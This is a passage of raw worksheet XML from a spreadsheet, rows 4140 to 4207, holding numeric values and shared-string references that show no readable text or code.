        <v>1.0</v>
      </c>
      <c r="E4140" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4140" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4141" ht="15.75" customHeight="1">
      <c r="A4141" s="1">
        <v>435.0</v>
      </c>
      <c r="B4141" s="2">
        <v>1.7012333E7</v>
      </c>
      <c r="C4141" s="2" t="s">
        <v>3934</v>
      </c>
      <c r="D4141" s="2">
        <v>1.0</v>
      </c>
      <c r="E4141" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4141" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4142" ht="15.75" customHeight="1">
      <c r="A4142" s="1">
        <v>836.0</v>
      </c>
      <c r="B4142" s="2">
        <v>2.1585966E7</v>
      </c>
      <c r="C4142" s="2" t="s">
        <v>3935</v>
      </c>
      <c r="D4142" s="2">
        <v>1.0</v>
      </c>
      <c r="E4142" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4142" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4143" ht="15.75" customHeight="1">
      <c r="A4143" s="1">
        <v>981.0</v>
      </c>
      <c r="B4143" s="2">
        <v>2.2822527E7</v>
      </c>
      <c r="C4143" s="2" t="s">
        <v>3936</v>
      </c>
      <c r="D4143" s="2">
        <v>1.0</v>
      </c>
      <c r="E4143" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4143" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4144" ht="15.75" customHeight="1">
      <c r="A4144" s="1">
        <v>1351.0</v>
      </c>
      <c r="B4144" s="2">
        <v>2.5960572E7</v>
      </c>
      <c r="C4144" s="2" t="s">
        <v>3937</v>
      </c>
      <c r="D4144" s="2">
        <v>1.0</v>
      </c>
      <c r="E4144" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4144" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4145" ht="15.75" customHeight="1">
      <c r="A4145" s="1">
        <v>1733.0</v>
      </c>
      <c r="B4145" s="2">
        <v>2.8754971E7</v>
      </c>
      <c r="C4145" s="2" t="s">
        <v>3938</v>
      </c>
      <c r="D4145" s="2">
        <v>1.0</v>
      </c>
      <c r="E4145" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4145" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4146" ht="15.75" customHeight="1">
      <c r="A4146" s="1">
        <v>1849.0</v>
      </c>
      <c r="B4146" s="2">
        <v>2.9454133E7</v>
      </c>
      <c r="C4146" s="2" t="s">
        <v>3939</v>
      </c>
      <c r="D4146" s="2">
        <v>1.0</v>
      </c>
      <c r="E4146" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4146" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4147" ht="15.75" customHeight="1">
      <c r="A4147" s="1">
        <v>1867.0</v>
      </c>
      <c r="B4147" s="2">
        <v>2.9581717E7</v>
      </c>
      <c r="C4147" s="2" t="s">
        <v>3940</v>
      </c>
      <c r="D4147" s="2">
        <v>1.0</v>
      </c>
      <c r="E4147" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4147" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4148" ht="15.75" customHeight="1">
      <c r="A4148" s="1">
        <v>2237.0</v>
      </c>
      <c r="B4148" s="2">
        <v>3.2286475E7</v>
      </c>
      <c r="C4148" s="2" t="s">
        <v>3941</v>
      </c>
      <c r="D4148" s="2">
        <v>1.0</v>
      </c>
      <c r="E4148" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4148" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4149" ht="15.75" customHeight="1">
      <c r="A4149" s="1">
        <v>2308.0</v>
      </c>
      <c r="B4149" s="2">
        <v>3.2782391E7</v>
      </c>
      <c r="C4149" s="2" t="s">
        <v>3942</v>
      </c>
      <c r="D4149" s="2">
        <v>1.0</v>
      </c>
      <c r="E4149" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4149" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4150" ht="15.75" customHeight="1">
      <c r="A4150" s="1">
        <v>3581.0</v>
      </c>
      <c r="B4150" s="2">
        <v>3.9016997E7</v>
      </c>
      <c r="C4150" s="2" t="s">
        <v>3943</v>
      </c>
      <c r="D4150" s="2">
        <v>1.0</v>
      </c>
      <c r="E4150" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4150" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4151" ht="15.75" customHeight="1">
      <c r="A4151" s="1">
        <v>3695.0</v>
      </c>
      <c r="B4151" s="2">
        <v>3.9530308E7</v>
      </c>
      <c r="C4151" s="2" t="s">
        <v>3944</v>
      </c>
      <c r="D4151" s="2">
        <v>1.0</v>
      </c>
      <c r="E4151" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4151" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4152" ht="15.75" customHeight="1">
      <c r="A4152" s="1">
        <v>4034.0</v>
      </c>
      <c r="B4152" s="2">
        <v>4.1009233E7</v>
      </c>
      <c r="C4152" s="2" t="s">
        <v>3945</v>
      </c>
      <c r="D4152" s="2">
        <v>1.0</v>
      </c>
      <c r="E4152" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4152" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4153" ht="15.75" customHeight="1">
      <c r="A4153" s="1">
        <v>4054.0</v>
      </c>
      <c r="B4153" s="2">
        <v>4.1116336E7</v>
      </c>
      <c r="C4153" s="2" t="s">
        <v>3946</v>
      </c>
      <c r="D4153" s="2">
        <v>1.0</v>
      </c>
      <c r="E4153" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4153" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4154" ht="15.75" customHeight="1">
      <c r="A4154" s="1">
        <v>4395.0</v>
      </c>
      <c r="B4154" s="2">
        <v>4.2263012E7</v>
      </c>
      <c r="C4154" s="2" t="s">
        <v>3947</v>
      </c>
      <c r="D4154" s="2">
        <v>1.0</v>
      </c>
      <c r="E4154" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4154" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4155" ht="15.75" customHeight="1">
      <c r="A4155" s="1">
        <v>4424.0</v>
      </c>
      <c r="B4155" s="2">
        <v>4.2307925E7</v>
      </c>
      <c r="C4155" s="2" t="s">
        <v>3948</v>
      </c>
      <c r="D4155" s="2">
        <v>1.0</v>
      </c>
      <c r="E4155" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4155" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4156" ht="15.75" customHeight="1">
      <c r="A4156" s="1">
        <v>4432.0</v>
      </c>
      <c r="B4156" s="2">
        <v>4.2350135E7</v>
      </c>
      <c r="C4156" s="2" t="s">
        <v>3949</v>
      </c>
      <c r="D4156" s="2">
        <v>1.0</v>
      </c>
      <c r="E4156" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4156" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4157" ht="15.75" customHeight="1">
      <c r="A4157" s="1">
        <v>4462.0</v>
      </c>
      <c r="B4157" s="2">
        <v>4.2457198E7</v>
      </c>
      <c r="C4157" s="2" t="s">
        <v>3950</v>
      </c>
      <c r="D4157" s="2">
        <v>1.0</v>
      </c>
      <c r="E4157" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4157" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4158" ht="15.75" customHeight="1">
      <c r="A4158" s="1">
        <v>4698.0</v>
      </c>
      <c r="B4158" s="2">
        <v>4.3244491E7</v>
      </c>
      <c r="C4158" s="2" t="s">
        <v>3951</v>
      </c>
      <c r="D4158" s="2">
        <v>1.0</v>
      </c>
      <c r="E4158" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4158" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4159" ht="15.75" customHeight="1">
      <c r="A4159" s="1">
        <v>4751.0</v>
      </c>
      <c r="B4159" s="2">
        <v>4.3386864E7</v>
      </c>
      <c r="C4159" s="2" t="s">
        <v>3952</v>
      </c>
      <c r="D4159" s="2">
        <v>1.0</v>
      </c>
      <c r="E4159" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4159" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4160" ht="15.75" customHeight="1">
      <c r="A4160" s="1">
        <v>4774.0</v>
      </c>
      <c r="B4160" s="2">
        <v>4.3438979E7</v>
      </c>
      <c r="C4160" s="2" t="s">
        <v>3953</v>
      </c>
      <c r="D4160" s="2">
        <v>1.0</v>
      </c>
      <c r="E4160" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4160" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4161" ht="15.75" customHeight="1">
      <c r="A4161" s="1">
        <v>4922.0</v>
      </c>
      <c r="B4161" s="2">
        <v>4.3961223E7</v>
      </c>
      <c r="C4161" s="2" t="s">
        <v>3954</v>
      </c>
      <c r="D4161" s="2">
        <v>1.0</v>
      </c>
      <c r="E4161" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4161" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4162" ht="15.75" customHeight="1">
      <c r="A4162" s="1">
        <v>6644.0</v>
      </c>
      <c r="B4162" s="2">
        <v>4.9082463E7</v>
      </c>
      <c r="C4162" s="2" t="s">
        <v>3955</v>
      </c>
      <c r="D4162" s="2">
        <v>1.0</v>
      </c>
      <c r="E4162" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4162" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4163" ht="15.75" customHeight="1">
      <c r="A4163" s="1">
        <v>6725.0</v>
      </c>
      <c r="B4163" s="2">
        <v>4.9298771E7</v>
      </c>
      <c r="C4163" s="2" t="s">
        <v>3956</v>
      </c>
      <c r="D4163" s="2">
        <v>1.0</v>
      </c>
      <c r="E4163" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4163" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4164" ht="15.75" customHeight="1">
      <c r="A4164" s="1">
        <v>7028.0</v>
      </c>
      <c r="B4164" s="2">
        <v>5.0115682E7</v>
      </c>
      <c r="C4164" s="2" t="s">
        <v>3957</v>
      </c>
      <c r="D4164" s="2">
        <v>1.0</v>
      </c>
      <c r="E4164" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4164" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4165" ht="15.75" customHeight="1">
      <c r="A4165" s="1">
        <v>7598.0</v>
      </c>
      <c r="B4165" s="2">
        <v>5.1627934E7</v>
      </c>
      <c r="C4165" s="2" t="s">
        <v>3958</v>
      </c>
      <c r="D4165" s="2">
        <v>1.0</v>
      </c>
      <c r="E4165" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4165" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4166" ht="15.75" customHeight="1">
      <c r="A4166" s="1">
        <v>7813.0</v>
      </c>
      <c r="B4166" s="2">
        <v>5.2258447E7</v>
      </c>
      <c r="C4166" s="2" t="s">
        <v>3959</v>
      </c>
      <c r="D4166" s="2">
        <v>1.0</v>
      </c>
      <c r="E4166" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4166" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4167" ht="15.75" customHeight="1">
      <c r="A4167" s="1">
        <v>7932.0</v>
      </c>
      <c r="B4167" s="2">
        <v>5.2580643E7</v>
      </c>
      <c r="C4167" s="2" t="s">
        <v>3960</v>
      </c>
      <c r="D4167" s="2">
        <v>1.0</v>
      </c>
      <c r="E4167" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4167" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4168" ht="15.75" customHeight="1">
      <c r="A4168" s="1">
        <v>8249.0</v>
      </c>
      <c r="B4168" s="2">
        <v>5.3377408E7</v>
      </c>
      <c r="C4168" s="2" t="s">
        <v>3961</v>
      </c>
      <c r="D4168" s="2">
        <v>1.0</v>
      </c>
      <c r="E4168" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4168" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4169" ht="15.75" customHeight="1">
      <c r="A4169" s="1">
        <v>9520.0</v>
      </c>
      <c r="B4169" s="2">
        <v>5.5976425E7</v>
      </c>
      <c r="C4169" s="2" t="s">
        <v>3962</v>
      </c>
      <c r="D4169" s="2">
        <v>1.0</v>
      </c>
      <c r="E4169" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4169" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4170" ht="15.75" customHeight="1">
      <c r="A4170" s="1">
        <v>9635.0</v>
      </c>
      <c r="B4170" s="2">
        <v>5.6236698E7</v>
      </c>
      <c r="C4170" s="2" t="s">
        <v>3963</v>
      </c>
      <c r="D4170" s="2">
        <v>1.0</v>
      </c>
      <c r="E4170" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4170" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4171" ht="15.75" customHeight="1">
      <c r="A4171" s="1">
        <v>9724.0</v>
      </c>
      <c r="B4171" s="2">
        <v>5.6431549E7</v>
      </c>
      <c r="C4171" s="2" t="s">
        <v>3964</v>
      </c>
      <c r="D4171" s="2">
        <v>1.0</v>
      </c>
      <c r="E4171" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4171" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4172" ht="15.75" customHeight="1">
      <c r="A4172" s="1">
        <v>9725.0</v>
      </c>
      <c r="B4172" s="2">
        <v>5.6431549E7</v>
      </c>
      <c r="C4172" s="2" t="s">
        <v>3965</v>
      </c>
      <c r="D4172" s="2">
        <v>1.0</v>
      </c>
      <c r="E4172" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4172" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4173" ht="15.75" customHeight="1">
      <c r="A4173" s="1">
        <v>9744.0</v>
      </c>
      <c r="B4173" s="2">
        <v>5.6464865E7</v>
      </c>
      <c r="C4173" s="2" t="s">
        <v>3966</v>
      </c>
      <c r="D4173" s="2">
        <v>1.0</v>
      </c>
      <c r="E4173" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4173" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4174" ht="15.75" customHeight="1">
      <c r="A4174" s="1">
        <v>9975.0</v>
      </c>
      <c r="B4174" s="2">
        <v>5.6943467E7</v>
      </c>
      <c r="C4174" s="2" t="s">
        <v>3967</v>
      </c>
      <c r="D4174" s="2">
        <v>1.0</v>
      </c>
      <c r="E4174" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4174" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4175" ht="15.75" customHeight="1">
      <c r="A4175" s="1">
        <v>10421.0</v>
      </c>
      <c r="B4175" s="2">
        <v>1.03198E7</v>
      </c>
      <c r="C4175" s="2" t="s">
        <v>3968</v>
      </c>
      <c r="D4175" s="2">
        <v>1.0</v>
      </c>
      <c r="E4175" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4175" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4176" ht="15.75" customHeight="1">
      <c r="A4176" s="1">
        <v>10562.0</v>
      </c>
      <c r="B4176" s="2">
        <v>1.2862821E7</v>
      </c>
      <c r="C4176" s="2" t="s">
        <v>3969</v>
      </c>
      <c r="D4176" s="2">
        <v>1.0</v>
      </c>
      <c r="E4176" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4176" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4177" ht="15.75" customHeight="1">
      <c r="A4177" s="1">
        <v>10708.0</v>
      </c>
      <c r="B4177" s="2">
        <v>1.4918116E7</v>
      </c>
      <c r="C4177" s="2" t="s">
        <v>3970</v>
      </c>
      <c r="D4177" s="2">
        <v>1.0</v>
      </c>
      <c r="E4177" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4177" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4178" ht="15.75" customHeight="1">
      <c r="A4178" s="1">
        <v>10729.0</v>
      </c>
      <c r="B4178" s="2">
        <v>1.5256033E7</v>
      </c>
      <c r="C4178" s="2" t="s">
        <v>3971</v>
      </c>
      <c r="D4178" s="2">
        <v>1.0</v>
      </c>
      <c r="E4178" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4178" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4179" ht="15.75" customHeight="1">
      <c r="A4179" s="1">
        <v>11161.0</v>
      </c>
      <c r="B4179" s="2">
        <v>195331.0</v>
      </c>
      <c r="C4179" s="2" t="s">
        <v>3972</v>
      </c>
      <c r="D4179" s="2">
        <v>1.0</v>
      </c>
      <c r="E4179" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4179" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4180" ht="15.75" customHeight="1">
      <c r="A4180" s="1">
        <v>11201.0</v>
      </c>
      <c r="B4180" s="2">
        <v>1.9939109E7</v>
      </c>
      <c r="C4180" s="2" t="s">
        <v>3973</v>
      </c>
      <c r="D4180" s="2">
        <v>1.0</v>
      </c>
      <c r="E4180" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4180" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4181" ht="15.75" customHeight="1">
      <c r="A4181" s="1">
        <v>11286.0</v>
      </c>
      <c r="B4181" s="2">
        <v>2.082213E7</v>
      </c>
      <c r="C4181" s="2" t="s">
        <v>3974</v>
      </c>
      <c r="D4181" s="2">
        <v>1.0</v>
      </c>
      <c r="E4181" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4181" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4182" ht="15.75" customHeight="1">
      <c r="A4182" s="1">
        <v>11679.0</v>
      </c>
      <c r="B4182" s="2">
        <v>2.3439774E7</v>
      </c>
      <c r="C4182" s="2" t="s">
        <v>3975</v>
      </c>
      <c r="D4182" s="2">
        <v>1.0</v>
      </c>
      <c r="E4182" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4182" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4183" ht="15.75" customHeight="1">
      <c r="A4183" s="1">
        <v>12364.0</v>
      </c>
      <c r="B4183" s="2">
        <v>2.8762979E7</v>
      </c>
      <c r="C4183" s="2" t="s">
        <v>3976</v>
      </c>
      <c r="D4183" s="2">
        <v>1.0</v>
      </c>
      <c r="E4183" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4183" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4184" ht="15.75" customHeight="1">
      <c r="A4184" s="1">
        <v>12547.0</v>
      </c>
      <c r="B4184" s="2">
        <v>2.9869406E7</v>
      </c>
      <c r="C4184" s="2" t="s">
        <v>3977</v>
      </c>
      <c r="D4184" s="2">
        <v>1.0</v>
      </c>
      <c r="E4184" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4184" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4185" ht="15.75" customHeight="1">
      <c r="A4185" s="1">
        <v>12596.0</v>
      </c>
      <c r="B4185" s="2">
        <v>3.0073358E7</v>
      </c>
      <c r="C4185" s="2" t="s">
        <v>3978</v>
      </c>
      <c r="D4185" s="2">
        <v>1.0</v>
      </c>
      <c r="E4185" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4185" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4186" ht="15.75" customHeight="1">
      <c r="A4186" s="1">
        <v>12717.0</v>
      </c>
      <c r="B4186" s="2">
        <v>3.0865268E7</v>
      </c>
      <c r="C4186" s="2" t="s">
        <v>3979</v>
      </c>
      <c r="D4186" s="2">
        <v>1.0</v>
      </c>
      <c r="E4186" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4186" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4187" ht="15.75" customHeight="1">
      <c r="A4187" s="1">
        <v>12823.0</v>
      </c>
      <c r="B4187" s="2">
        <v>3.1622109E7</v>
      </c>
      <c r="C4187" s="2" t="s">
        <v>3980</v>
      </c>
      <c r="D4187" s="2">
        <v>1.0</v>
      </c>
      <c r="E4187" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4187" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4188" ht="15.75" customHeight="1">
      <c r="A4188" s="1">
        <v>12954.0</v>
      </c>
      <c r="B4188" s="2">
        <v>3.2403983E7</v>
      </c>
      <c r="C4188" s="2" t="s">
        <v>3981</v>
      </c>
      <c r="D4188" s="2">
        <v>1.0</v>
      </c>
      <c r="E4188" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4188" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4189" ht="15.75" customHeight="1">
      <c r="A4189" s="1">
        <v>13131.0</v>
      </c>
      <c r="B4189" s="2">
        <v>3.3679283E7</v>
      </c>
      <c r="C4189" s="2" t="s">
        <v>3982</v>
      </c>
      <c r="D4189" s="2">
        <v>1.0</v>
      </c>
      <c r="E4189" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4189" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4190" ht="15.75" customHeight="1">
      <c r="A4190" s="1">
        <v>13147.0</v>
      </c>
      <c r="B4190" s="2">
        <v>3.3802166E7</v>
      </c>
      <c r="C4190" s="2" t="s">
        <v>3983</v>
      </c>
      <c r="D4190" s="2">
        <v>1.0</v>
      </c>
      <c r="E4190" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4190" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4191" ht="15.75" customHeight="1">
      <c r="A4191" s="1">
        <v>13304.0</v>
      </c>
      <c r="B4191" s="2">
        <v>3.4512974E7</v>
      </c>
      <c r="C4191" s="2" t="s">
        <v>3984</v>
      </c>
      <c r="D4191" s="2">
        <v>1.0</v>
      </c>
      <c r="E4191" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4191" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4192" ht="15.75" customHeight="1">
      <c r="A4192" s="1">
        <v>13376.0</v>
      </c>
      <c r="B4192" s="2">
        <v>3.4875459E7</v>
      </c>
      <c r="C4192" s="2" t="s">
        <v>3985</v>
      </c>
      <c r="D4192" s="2">
        <v>1.0</v>
      </c>
      <c r="E4192" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4192" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4193" ht="15.75" customHeight="1">
      <c r="A4193" s="1">
        <v>13708.0</v>
      </c>
      <c r="B4193" s="2">
        <v>3.6218191E7</v>
      </c>
      <c r="C4193" s="2" t="s">
        <v>3986</v>
      </c>
      <c r="D4193" s="2">
        <v>1.0</v>
      </c>
      <c r="E4193" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4193" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4194" ht="15.75" customHeight="1">
      <c r="A4194" s="1">
        <v>14498.0</v>
      </c>
      <c r="B4194" s="2">
        <v>3.9662301E7</v>
      </c>
      <c r="C4194" s="2" t="s">
        <v>3987</v>
      </c>
      <c r="D4194" s="2">
        <v>1.0</v>
      </c>
      <c r="E4194" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4194" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4195" ht="15.75" customHeight="1">
      <c r="A4195" s="1">
        <v>14553.0</v>
      </c>
      <c r="B4195" s="2">
        <v>3.9969049E7</v>
      </c>
      <c r="C4195" s="2" t="s">
        <v>3988</v>
      </c>
      <c r="D4195" s="2">
        <v>1.0</v>
      </c>
      <c r="E4195" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4195" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4196" ht="15.75" customHeight="1">
      <c r="A4196" s="1">
        <v>14705.0</v>
      </c>
      <c r="B4196" s="2">
        <v>4.0585338E7</v>
      </c>
      <c r="C4196" s="2" t="s">
        <v>3989</v>
      </c>
      <c r="D4196" s="2">
        <v>1.0</v>
      </c>
      <c r="E4196" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4196" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4197" ht="15.75" customHeight="1">
      <c r="A4197" s="1">
        <v>15539.0</v>
      </c>
      <c r="B4197" s="2">
        <v>4.3347443E7</v>
      </c>
      <c r="C4197" s="2" t="s">
        <v>3990</v>
      </c>
      <c r="D4197" s="2">
        <v>1.0</v>
      </c>
      <c r="E4197" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4197" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4198" ht="15.75" customHeight="1">
      <c r="A4198" s="1">
        <v>15812.0</v>
      </c>
      <c r="B4198" s="2">
        <v>4.4252782E7</v>
      </c>
      <c r="C4198" s="2" t="s">
        <v>3991</v>
      </c>
      <c r="D4198" s="2">
        <v>1.0</v>
      </c>
      <c r="E4198" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4198" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4199" ht="15.75" customHeight="1">
      <c r="A4199" s="1">
        <v>15846.0</v>
      </c>
      <c r="B4199" s="2">
        <v>4.4430725E7</v>
      </c>
      <c r="C4199" s="2" t="s">
        <v>3992</v>
      </c>
      <c r="D4199" s="2">
        <v>1.0</v>
      </c>
      <c r="E4199" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4199" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4200" ht="15.75" customHeight="1">
      <c r="A4200" s="1">
        <v>16317.0</v>
      </c>
      <c r="B4200" s="2">
        <v>4.5969516E7</v>
      </c>
      <c r="C4200" s="2" t="s">
        <v>3993</v>
      </c>
      <c r="D4200" s="2">
        <v>1.0</v>
      </c>
      <c r="E4200" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4200" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4201" ht="15.75" customHeight="1">
      <c r="A4201" s="1">
        <v>16833.0</v>
      </c>
      <c r="B4201" s="2">
        <v>4.789391E7</v>
      </c>
      <c r="C4201" s="2" t="s">
        <v>3994</v>
      </c>
      <c r="D4201" s="2">
        <v>1.0</v>
      </c>
      <c r="E4201" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4201" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4202" ht="15.75" customHeight="1">
      <c r="A4202" s="1">
        <v>17535.0</v>
      </c>
      <c r="B4202" s="2">
        <v>5.0112937E7</v>
      </c>
      <c r="C4202" s="2" t="s">
        <v>3995</v>
      </c>
      <c r="D4202" s="2">
        <v>1.0</v>
      </c>
      <c r="E4202" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4202" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4203" ht="15.75" customHeight="1">
      <c r="A4203" s="1">
        <v>18015.0</v>
      </c>
      <c r="B4203" s="2">
        <v>5.1481043E7</v>
      </c>
      <c r="C4203" s="2" t="s">
        <v>3996</v>
      </c>
      <c r="D4203" s="2">
        <v>1.0</v>
      </c>
      <c r="E4203" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4203" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4204" ht="15.75" customHeight="1">
      <c r="A4204" s="1">
        <v>18881.0</v>
      </c>
      <c r="B4204" s="2">
        <v>5.4098523E7</v>
      </c>
      <c r="C4204" s="2" t="s">
        <v>3997</v>
      </c>
      <c r="D4204" s="2">
        <v>1.0</v>
      </c>
      <c r="E4204" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4204" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4205" ht="15.75" customHeight="1">
      <c r="A4205" s="1">
        <v>18975.0</v>
      </c>
      <c r="B4205" s="2">
        <v>5.437507E7</v>
      </c>
      <c r="C4205" s="2" t="s">
        <v>3998</v>
      </c>
      <c r="D4205" s="2">
        <v>1.0</v>
      </c>
      <c r="E4205" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4205" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4206" ht="15.75" customHeight="1">
      <c r="A4206" s="1">
        <v>19025.0</v>
      </c>
      <c r="B4206" s="2">
        <v>5.4552554E7</v>
      </c>
      <c r="C4206" s="2" t="s">
        <v>3999</v>
      </c>
      <c r="D4206" s="2">
        <v>1.0</v>
      </c>
      <c r="E4206" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4206" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="4207" ht="15.75" customHeight="1">
      <c r="A4207" s="1">
        <v>19037.0</v>
      </c>
      <c r="B4207" s="2">
        <v>5.4560917E7</v>
      </c>
      <c r="C4207" s="2" t="s">
        <v>4000</v>
      </c>
      <c r="D4207" s="2">
